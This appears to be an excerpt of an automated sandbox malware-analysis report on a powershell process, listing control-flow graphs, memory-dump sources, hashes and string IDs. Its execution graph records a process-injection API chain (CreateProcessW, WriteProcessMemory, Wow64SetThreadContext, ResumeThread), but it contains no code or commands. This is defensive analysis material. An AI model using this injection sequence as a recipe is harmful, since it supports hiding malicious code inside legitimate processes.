                                                                                                                                                                                • Instruction Fuzzy Hash: E622D23090CB894FD799EB2C84506797FE2FF9A344F2401EAD48ED72A2DA25AC55C741

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:4%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:15
                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                execution_graph 6540 7fe899bf0dd 6541 7fe899bf162 CreateProcessW 6540->6541 6543 7fe899bf3a3 6541->6543 6544 7fe899bd8a6 6545 7fe899bd8ad 6544->6545 6547 7fe899bd1b4 6545->6547 6548 7fe899b8178 6545->6548 6549 7fe899bf4f0 Wow64SetThreadContext 6548->6549 6551 7fe899bf583 6549->6551 6551->6547 6552 7fe899bf7b4 6553 7fe899bf7bd WriteProcessMemory 6552->6553 6555 7fe899bf8a1 6553->6555 6556 7fe899bf975 6557 7fe899bf9a0 ResumeThread 6556->6557 6559 7fe899bfa1b 6557->6559

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 000007FE89A80858 Relevance: 4.5, Strings: 3, Instructions: 790COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 318 7fe89a80858-7fe89a80904 319 7fe89a8090a-7fe89a80914 318->319 320 7fe89a80a3d-7fe89a80ae9 318->320 321 7fe89a80916-7fe89a80923 319->321 322 7fe89a8092d-7fe89a80932 319->322 354 7fe89a80aeb 320->354 355 7fe89a80aec-7fe89a80afd 320->355 321->322 323 7fe89a80925-7fe89a8092b 321->323 324 7fe89a80938-7fe89a8093b 322->324 325 7fe89a809de-7fe89a809e8 322->325 323->322 327 7fe89a8093d-7fe89a80950 324->327 328 7fe89a80952 324->328 329 7fe89a809f7-7fe89a80a07 325->329 330 7fe89a809ea-7fe89a809f6 325->330 332 7fe89a80954-7fe89a80956 327->332 328->332 334 7fe89a80a09-7fe89a80a0d 329->334 335 7fe89a80a14-7fe89a80a3a 329->335 332->325 336 7fe89a8095c-7fe89a8095f 332->336 334->335 335->320 338 7fe89a80986 336->338 339 7fe89a80961-7fe89a80984 336->339 341 7fe89a80988-7fe89a8098a 338->341 339->341 341->325 344 7fe89a8098c-7fe89a809a8 341->344 349 7fe89a809ae-7fe89a809b7 344->349 350 7fe89a809b9-7fe89a809c6 349->350 351 7fe89a809d0-7fe89a809dd 349->351 350->351 353 7fe89a809c8-7fe89a809ce 350->353 353->351 354->355 356 7fe89a80aff 355->356 357 7fe89a80b00-7fe89a80b12 355->357 356->357 359 7fe89a80b2e-7fe89a80b94 357->359 360 7fe89a80b14-7fe89a80b2c 357->360 361 7fe89a80b9a-7fe89a80ba4 359->361 362 7fe89a80cf2-7fe89a80d8f 359->362 360->359 363 7fe89a80ba6-7fe89a80bb3 361->363 364 7fe89a80bbd-7fe89a80bc2 361->364 399 7fe89a80daa-7fe89a80db1 362->399 400 7fe89a80d91-7fe89a80d9d 362->400 363->364 366 7fe89a80bb5-7fe89a80bbb 363->366 367 7fe89a80bc8-7fe89a80bcb 364->367 368 7fe89a80c93-7fe89a80c9d 364->368 366->364 369 7fe89a80bcd-7fe89a80be0 367->369 370 7fe89a80be2 367->370 371 7fe89a80cac-7fe89a80cbc 368->371 372 7fe89a80c9f-7fe89a80cab 368->372 373 7fe89a80be4-7fe89a80be6 369->373 370->373 375 7fe89a80cc9-7fe89a80cef 371->375 376 7fe89a80cbe-7fe89a80cc2 371->376 373->368 378 7fe89a80bec-7fe89a80bef 373->378 375->362 376->375 379 7fe89a80c06 378->379 380 7fe89a80bf1-7fe89a80c04 378->380 383 7fe89a80c08-7fe89a80c0a 379->383 380->383 383->368 384 7fe89a80c10-7fe89a80c16 383->384 386 7fe89a80c18-7fe89a80c25 384->386 387 7fe89a80c32-7fe89a80c38 384->387 386->387 388 7fe89a80c27-7fe89a80c30 386->388 390 7fe89a80c3a-7fe89a80c47 387->390 391 7fe89a80c54-7fe89a80c92 387->391 388->387 390->391 392 7fe89a80c49-7fe89a80c52 390->392 392->391 401 7fe89a80db3 399->401 402 7fe89a80db4-7fe89a80dc2 399->402 403 7fe89a80d9f 400->403 404 7fe89a80da0-7fe89a80da9 400->404 401->402 405 7fe89a80dde-7fe89a80dec 402->405 406 7fe89a80dc4-7fe89a80dd1 402->406 403->404 404->399 408 7fe89a80dfb-7fe89a80e33 405->408 409 7fe89a80dee-7fe89a80dfa 405->409 410 7fe89a80eaf-7fe89a80eb9 408->410 411 7fe89a80e35-7fe89a80e4a 408->411 409->408 412 7fe89a80ebb-7fe89a80ec4 410->412 413 7fe89a80ec5-7fe89a80ed5 410->413 411->410 414 7fe89a80e4c-7fe89a80e59 411->414 415 7fe89a80ed7-7fe89a80edb 413->415 416 7fe89a80ee2-7fe89a80f05 413->416 417 7fe89a80e5b-7fe89a80e66 414->417 418 7fe89a80e6d-7fe89a80eac 414->418 415->416 417->418 418->410
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: XhT$r6R$r6R
                                                                                                                                                                                • API String ID: 0-1736375273
                                                                                                                                                                                • Opcode ID: 74e1c44a199ea00ee0ee709221366836dc4d38513c5b38fdad86c823f1ab71d4
                                                                                                                                                                                • Instruction ID: b1c020b23080d24c8e3fc9022d1aaa3928cd141b1bce5921b33957bb957b529f
                                                                                                                                                                                • Opcode Fuzzy Hash: 74e1c44a199ea00ee0ee709221366836dc4d38513c5b38fdad86c823f1ab71d4
                                                                                                                                                                                • Instruction Fuzzy Hash: 02323420A0DBDA0FE757A73858642B57FE1EF87254F1901EBC08ED71A3DA18AC59C351
                                                                                                                                                                                Function 000007FE89A800DD Relevance: 11.1, Strings: 8, Instructions: 1074COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (U[$(U[$(U[$(U[$(U[$(U[$r6R$r6R
                                                                                                                                                                                • API String ID: 0-3137147385
                                                                                                                                                                                • Opcode ID: 96ac6b7a05fba723e17a0e31ae6bca78c7713ec07a44c9a292d1397873025f72
                                                                                                                                                                                • Instruction ID: c68bbe1f0d3f1530a343c33eb87c6b86d35c35fd3c5dc105989dbdaf073857dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 96ac6b7a05fba723e17a0e31ae6bca78c7713ec07a44c9a292d1397873025f72
                                                                                                                                                                                • Instruction Fuzzy Hash: 0162353090DBDA0FE35AA72858512B97FE1EF47254F1901EBD48FE71A3E618AC16C352
                                                                                                                                                                                Function 000007FE89A81B05 Relevance: 5.7, Strings: 4, Instructions: 722COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 235 7fe89a81b05-7fe89a81b7c 236 7fe89a81bbd-7fe89a81c36 235->236 237 7fe89a81b7e-7fe89a81b88 235->237 242 7fe89a81d38-7fe89a81d40 236->242 243 7fe89a81c3c-7fe89a81c46 236->243 238 7fe89a81b8a-7fe89a81b97 237->238 239 7fe89a81b9e-7fe89a81bba 237->239 238->239 240 7fe89a81b99 238->240 239->236 240->239 249 7fe89a81d42-7fe89a81d70 242->249 244 7fe89a81c48-7fe89a81c55 243->244 245 7fe89a81c5f-7fe89a81c8e 243->245 244->245 246 7fe89a81c57-7fe89a81c5d 244->246 245->242 254 7fe89a81c94-7fe89a81c9e 245->254 246->245 253 7fe89a81d72-7fe89a81dd7 249->253 255 7fe89a81ddd-7fe89a81de7 253->255 256 7fe89a81f2f-7fe89a81fd9 253->256 257 7fe89a81cb7-7fe89a81d17 254->257 258 7fe89a81ca0-7fe89a81cad 254->258 259 7fe89a81de9-7fe89a81df6 255->259 260 7fe89a81e03-7fe89a81e10 255->260 300 7fe89a81fdb 256->300 301 7fe89a81fdc-7fe89a81fed 256->301 275 7fe89a81d19-7fe89a81d24 257->275 276 7fe89a81d2b-7fe89a81d37 257->276 258->257 262 7fe89a81caf-7fe89a81cb5 258->262 259->260 263 7fe89a81df8-7fe89a81e01 259->263 266 7fe89a81e16-7fe89a81e19 260->266 267 7fe89a81ed0-7fe89a81eda 260->267 262->257 263->260 266->267 272 7fe89a81e1f-7fe89a81e27 266->272 273 7fe89a81ee9-7fe89a81ef9 267->273 274 7fe89a81edc-7fe89a81ee8 267->274 272->256 277 7fe89a81e2d-7fe89a81e37 272->277 279 7fe89a81f06-7fe89a81f2c 273->279 280 7fe89a81efb-7fe89a81eff 273->280 275->276 281 7fe89a81e39-7fe89a81e46 277->281 282 7fe89a81e50-7fe89a81e54 277->282 279->256 280->279 281->282 284 7fe89a81e48-7fe89a81e4e 281->284 282->267 285 7fe89a81e56-7fe89a81e59 282->285 284->282 287 7fe89a81e5b-7fe89a81e6e 285->287 288 7fe89a81e70 285->288 290 7fe89a81e72-7fe89a81e74 287->290 288->290 290->267 292 7fe89a81e76-7fe89a81e7c 290->292 293 7fe89a81e9b-7fe89a81ea9 292->293 294 7fe89a81e7e-7fe89a81e8b 292->294 302 7fe89a81eab-7fe89a81eb8 293->302 303 7fe89a81ec2-7fe89a81ecf 293->303 294->293 296 7fe89a81e8d-7fe89a81e99 294->296 296->293 300->301 304 7fe89a81fef 301->304 305 7fe89a81ff0-7fe89a8200a 301->305 302->303 306 7fe89a81eba-7fe89a81ec0 302->306 304->305 307 7fe89a82026-7fe89a82038 305->307 308 7fe89a8200c-7fe89a82024 305->308 306->303 309 7fe89a82059-7fe89a820f5 307->309 310 7fe89a8203a-7fe89a82058 307->310 308->307 317 7fe89a820fd-7fe89a82115 309->317 310->309
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8hT$8hT$8hT$8hT
                                                                                                                                                                                • API String ID: 0-3692472035
                                                                                                                                                                                • Opcode ID: d9441e636ad48c72b08e4df708bfcc8437b13710f25dc6875fc6964a4af90ada
                                                                                                                                                                                • Instruction ID: 9fc223181f619a35058b4902b7cf127959faeefe7f5d1e2c4104573ad97569cb
                                                                                                                                                                                • Opcode Fuzzy Hash: d9441e636ad48c72b08e4df708bfcc8437b13710f25dc6875fc6964a4af90ada
                                                                                                                                                                                • Instruction Fuzzy Hash: 71221220A1D7CA0FE747A73848646B57FE1EF47248F1901EBD48DDB1A3D618AC5AC362
                                                                                                                                                                                Function 000007FE89A8427E Relevance: 2.9, Strings: 2, Instructions: 403COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 421 7fe89a8427e-7fe89a84304 423 7fe89a8430a-7fe89a84314 421->423 424 7fe89a844f3-7fe89a8459d 421->424 425 7fe89a84316-7fe89a84323 423->425 426 7fe89a8432d-7fe89a84332 423->426 458 7fe89a8459f 424->458 459 7fe89a845a0-7fe89a845b1 424->459 425->426 427 7fe89a84325-7fe89a8432b 425->427 428 7fe89a84338-7fe89a8433b 426->428 429 7fe89a84494-7fe89a8449e 426->429 427->426 433 7fe89a8433d-7fe89a84350 428->433 434 7fe89a84352 428->434 431 7fe89a844ad-7fe89a844bd 429->431 432 7fe89a844a0-7fe89a844ac 429->432 436 7fe89a844ca-7fe89a844f0 431->436 437 7fe89a844bf-7fe89a844c3 431->437 439 7fe89a84354-7fe89a84356 433->439 434->439 436->424 437->436 439->429 440 7fe89a8435c-7fe89a84393 439->440 446 7fe89a843b7 440->446 447 7fe89a84395-7fe89a843b5 440->447 449 7fe89a843b9-7fe89a843bb 446->449 447->449 449->429 452 7fe89a843c1-7fe89a843c4 449->452 453 7fe89a843c6-7fe89a843d9 452->453 454 7fe89a843db 452->454 457 7fe89a843dd-7fe89a843df 453->457 454->457 457->429 460 7fe89a843e5-7fe89a8441f 457->460 458->459 461 7fe89a845b3 459->461 462 7fe89a845b4-7fe89a845c2 459->462 470 7fe89a84438-7fe89a8443e 460->470 471 7fe89a84421-7fe89a8442e 460->471 461->462 463 7fe89a845de-7fe89a845e4 462->463 464 7fe89a845c4-7fe89a845ca 462->464 466 7fe89a845e6 463->466 464->466 467 7fe89a845cc-7fe89a845dc 464->467 467->463 473 7fe89a8445a-7fe89a8445d 470->473 474 7fe89a84440-7fe89a8444d 470->474 471->470 472 7fe89a84430-7fe89a84436 471->472 472->470 477 7fe89a84464-7fe89a8446d 473->477 474->473 475 7fe89a8444f-7fe89a84458 474->475 475->473 479 7fe89a84486-7fe89a84493 477->479 480 7fe89a8446f-7fe89a8447c 477->480 480->479 481 7fe89a8447e-7fe89a84484 480->481 481->479
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (be$XhT
                                                                                                                                                                                • API String ID: 0-1561679238
                                                                                                                                                                                • Opcode ID: 051b7336f5b5691c153a8e336ad87a74527adf9e3c3c659b0c9455c3c007b944
                                                                                                                                                                                • Instruction ID: b4df0783e64b1d1f504dc54a94112a5a6c48932c1c54a0bd67a0828bc3b48d66
                                                                                                                                                                                • Opcode Fuzzy Hash: 051b7336f5b5691c153a8e336ad87a74527adf9e3c3c659b0c9455c3c007b944
                                                                                                                                                                                • Instruction Fuzzy Hash: 21C1F520A1DBCA0FE747A73858242797FE1EF87654F1900EBD49ED72A3D918AC15C362
                                                                                                                                                                                Function 000007FE899BF0DD Relevance: 1.8, APIs: 1, Instructions: 346COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 483 7fe899bf0dd-7fe899bf160 484 7fe899bf162-7fe899bf171 483->484 485 7fe899bf17f-7fe899bf24d 483->485 486 7fe899bf17c-7fe899bf17d 484->486 487 7fe899bf173-7fe899bf17b 484->487 490 7fe899bf25f-7fe899bf264 485->490 491 7fe899bf24f-7fe899bf25c 485->491 486->485 487->486 492 7fe899bf266-7fe899bf276 490->492 493 7fe899bf282-7fe899bf2ad 490->493 491->490 492->493 494 7fe899bf278-7fe899bf280 493->494 495 7fe899bf2af-7fe899bf2c3 493->495 496 7fe899bf2c6-7fe899bf3a1 CreateProcessW 494->496 495->496 498 7fe899bf3a9-7fe899bf435 call 7fe899bf436 496->498 499 7fe899bf3a3 496->499 499->498
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fbdd69a3234632d9b347162d8c7d13197b21dfd5a5a815211abc2fda8bfd467b
                                                                                                                                                                                • Instruction ID: e48eaa575483dac73379555dc0749d87ab00f5bcb05e63fc10728f61007076a8
                                                                                                                                                                                • Opcode Fuzzy Hash: fbdd69a3234632d9b347162d8c7d13197b21dfd5a5a815211abc2fda8bfd467b
                                                                                                                                                                                • Instruction Fuzzy Hash: B8C1C47180CB988FDB56DF68D855AD97BF0FF5A310F0442DBD089D72A2CA34A985CB81
                                                                                                                                                                                Function 000007FE899B8158 Relevance: 1.8, APIs: 1, Instructions: 267processCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 506 7fe899b8158-7fe899bf24d 509 7fe899bf25f-7fe899bf264 506->509 510 7fe899bf24f-7fe899bf25c 506->510 511 7fe899bf266-7fe899bf276 509->511 512 7fe899bf282-7fe899bf2ad 509->512 510->509 511->512 513 7fe899bf278-7fe899bf280 512->513 514 7fe899bf2af-7fe899bf2c3 512->514 515 7fe899bf2c6-7fe899bf3a1 CreateProcessW 513->515 514->515 517 7fe899bf3a9-7fe899bf435 call 7fe899bf436 515->517 518 7fe899bf3a3 515->518 518->517
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                • Opcode ID: 900a4da365c21c7469615d964c8e08e77e5b461256521087859298ca3c3578ca
                                                                                                                                                                                • Instruction ID: 9384d40efcf7e4a77a1556ee3d24d66a40ef6b1476b3ae3fb1cdf9d812642f1c
                                                                                                                                                                                • Opcode Fuzzy Hash: 900a4da365c21c7469615d964c8e08e77e5b461256521087859298ca3c3578ca
                                                                                                                                                                                • Instruction Fuzzy Hash: DB916A31918A5C8FDBA5EF58D845BEDBBF1FB58310F10429AD44DE3261CB30A9858B81
                                                                                                                                                                                Function 000007FE899BF7B4 Relevance: 1.6, APIs: 1, Instructions: 140injectionCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 525 7fe899bf7b4-7fe899bf7bb 526 7fe899bf7bd-7fe899bf7c5 525->526 527 7fe899bf7c6-7fe899bf850 525->527 526->527 530 7fe899bf85a-7fe899bf89f WriteProcessMemory 527->530 531 7fe899bf852-7fe899bf857 527->531 532 7fe899bf8a7-7fe899bf8d1 530->532 533 7fe899bf8a1 530->533 531->530 533->532
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                • Opcode ID: 489ba237530a7151695a89e28b0b4ef8ba2f7477fe3fa90fad41962735377ee1
                                                                                                                                                                                • Instruction ID: 3bec29120de6414ac5073d910b2e0766f4ad75c44c733ad7d139dd80565a3ecc
                                                                                                                                                                                • Opcode Fuzzy Hash: 489ba237530a7151695a89e28b0b4ef8ba2f7477fe3fa90fad41962735377ee1
                                                                                                                                                                                • Instruction Fuzzy Hash: AA31F73191CB588FDB18EF5898467F97BE0FB99321F04426FE089D3252CB74A845CB91
                                                                                                                                                                                Function 000007FE899BF4A5 Relevance: 1.6, APIs: 1, Instructions: 133threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 534 7fe899bf4a5-7fe899bf4b1 535 7fe899bf4bc-7fe899bf545 534->535 536 7fe899bf4b3-7fe899bf4bb 534->536 539 7fe899bf547-7fe899bf54c 535->539 540 7fe899bf54f-7fe899bf581 Wow64SetThreadContext 535->540 536->535 539->540 541 7fe899bf589-7fe899bf5b0 540->541 542 7fe899bf583 540->542 542->541
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                • Opcode ID: 914f919407c7e3d2f43964d712163f4889451bd658c67a56aa8003105c0245f7
                                                                                                                                                                                • Instruction ID: 11348a86ca04f241276b6bc14d1b2b072d2ce84e4bdf13aa68680aa79d6e820c
                                                                                                                                                                                • Opcode Fuzzy Hash: 914f919407c7e3d2f43964d712163f4889451bd658c67a56aa8003105c0245f7
                                                                                                                                                                                • Instruction Fuzzy Hash: 5D41E63190C7988FDB16DF6898457E97FE0EB56321F08429BD488C7167D764A809CB92
                                                                                                                                                                                Function 000007FE899B81B8 Relevance: 1.6, APIs: 1, Instructions: 125injectionCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 543 7fe899b81b8-7fe899bf850 546 7fe899bf85a-7fe899bf89f WriteProcessMemory 543->546 547 7fe899bf852-7fe899bf857 543->547 548 7fe899bf8a7-7fe899bf8d1 546->548 549 7fe899bf8a1 546->549 547->546 549->548
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                • Opcode ID: 83d5a8b3c634013bd8e19374531f16d52604cc15059c24a5d38e11bbc63db9d6
                                                                                                                                                                                • Instruction ID: 8334733f2134a4955b72e5936b6c7466738bc5c3348bf2bd9ea9a5cbd16ed6d4
                                                                                                                                                                                • Opcode Fuzzy Hash: 83d5a8b3c634013bd8e19374531f16d52604cc15059c24a5d38e11bbc63db9d6
                                                                                                                                                                                • Instruction Fuzzy Hash: CA31B23191CB588FDB18EF5C98466FD7BE4FBA9711F00426FE08AD3251CB74A8458B91
                                                                                                                                                                                Function 000007FE899B8178 Relevance: 1.6, APIs: 1, Instructions: 106threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 550 7fe899b8178-7fe899bf545 553 7fe899bf547-7fe899bf54c 550->553 554 7fe899bf54f-7fe899bf581 Wow64SetThreadContext 550->554 553->554 555 7fe899bf589-7fe899bf5b0 554->555 556 7fe899bf583 554->556 556->555
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                • Opcode ID: bc772a59aa2ed217b10fdcdfcb557d8f8c9129397939db76159e6e2507a841fa
                                                                                                                                                                                • Instruction ID: fb3644dffdb45a8e45bbbe6db467dfdffd097795214262186cd5113124c7d2c8
                                                                                                                                                                                • Opcode Fuzzy Hash: bc772a59aa2ed217b10fdcdfcb557d8f8c9129397939db76159e6e2507a841fa
                                                                                                                                                                                • Instruction Fuzzy Hash: CB31E33190CB1C8FDB54DF9C98897EA7BE1FBA9720F04825BD449C3126DB74A8068B91
                                                                                                                                                                                Function 000007FE899BF975 Relevance: 1.6, APIs: 1, Instructions: 105threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 557 7fe899bf975-7fe899bfa19 ResumeThread 560 7fe899bfa1b 557->560 561 7fe899bfa21-7fe899bfa3d 557->561 560->561
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                • Opcode ID: db7547fb1f68b04ebffe80ce66133e6512e94cf167191dd85e2f9cf952482528
                                                                                                                                                                                • Instruction ID: 18ac01efd878b778c0fa5bc665c707a292e81859c62cc39bede35fbc256e4afd
                                                                                                                                                                                • Opcode Fuzzy Hash: db7547fb1f68b04ebffe80ce66133e6512e94cf167191dd85e2f9cf952482528
                                                                                                                                                                                • Instruction Fuzzy Hash: 6721F37190CA4C9FDB59DB58D84ABF97BE0EBA6320F00421FD089C3662C7606856CB91
                                                                                                                                                                                Function 000007FE899B81E8 Relevance: 1.6, APIs: 1, Instructions: 89threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 562 7fe899b81e8-7fe899bfa19 ResumeThread 565 7fe899bfa1b 562->565 566 7fe899bfa21-7fe899bfa3d 562->566 565->566
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                • Opcode ID: 87c8d6cb1827c8dd3dd44969ae51cc6f9c0cfb0487dac7b18db8df0bc9f3eca6
                                                                                                                                                                                • Instruction ID: e154d24a2772fada52aebe8ad7b3965c3bef7cd918a2145e188b4f7dfffbe791
                                                                                                                                                                                • Opcode Fuzzy Hash: 87c8d6cb1827c8dd3dd44969ae51cc6f9c0cfb0487dac7b18db8df0bc9f3eca6
                                                                                                                                                                                • Instruction Fuzzy Hash: 1021C13190CA4C9FDB58DB5CD849BB9BBE0FBA9321F00421ED04AD3661D7706416CB91
                                                                                                                                                                                Function 000007FE89A84B89 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
